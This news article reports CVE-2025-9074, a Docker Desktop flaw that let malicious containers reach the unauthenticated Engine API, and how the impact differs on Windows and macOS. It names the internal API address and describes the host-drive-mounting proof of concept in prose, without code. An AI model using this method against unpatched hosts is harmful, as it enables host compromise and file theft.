Critical Vulnerability in Docker Desktop Allowed Host Compromise
A critical vulnerability in Docker Desktop for Windows and macOS made it possible to compromise the host system by running a malicious container—even when Enhanced Container Isolation (ECI) protection was enabled.
The flaw, tracked as CVE-2025-9074 with a CVSS score of 9.3, is classified as a server-side request forgery (SSRF) bug. Docker has patched the issue in version 4.44.3.
“A malicious container running in Docker Desktop could gain access to the Docker Engine and launch additional containers without requiring the mounting of the Docker socket,” Docker developers explained in a security advisory. “This could lead to unauthorized access to user files on the host system. Enhanced Container Isolation (ECI) does not protect against this vulnerability.”
Vulnerability Discovery
The issue was discovered by Felix Boulet, an information security specialist, who demonstrated that containers could access the Docker Engine API without authentication via the address:
http://192.168.65[.]7:2375/
From within a container, Boulet was able to create and launch a new container that mounted the C:\ drive of a Windows host into its own file system—using only two wget HTTP POST requests. Notably, his proof-of-concept exploit required no code execution privileges inside the container.
Cross-Platform Impact
Philippe Dugre, a DevSecOps engineer at Pvotal Technologies and challenge designer for the NorthSec security conference, confirmed that the flaw affected Docker Desktop for Windows and macOS, but not Linux.
According to Dugre, the vulnerability poses a greater risk on Windows because Docker Engine runs inside WSL2 (Windows Subsystem for Linux 2):
“In Windows, an attacker can mount the entire file system with administrator rights and read any file. Ultimately, they could overwrite a system DLL to escalate privileges to the host system’s administrator,” Dugre wrote.
On macOS, however, the impact is mitigated by additional operating system safeguards:
- Attempts to mount a user directory trigger a permission prompt.
- By default, Docker Desktop does not run with administrator privileges.
- The application lacks access to the rest of the file system without explicit user consent.
Remaining Risks on macOS
Despite these safeguards, Dugre cautioned that the flaw still poses risks on macOS. Because attackers could gain full control over the Docker Desktop application and containers, they might still establish backdoors, alter configurations, or manipulate container behavior without user approval.
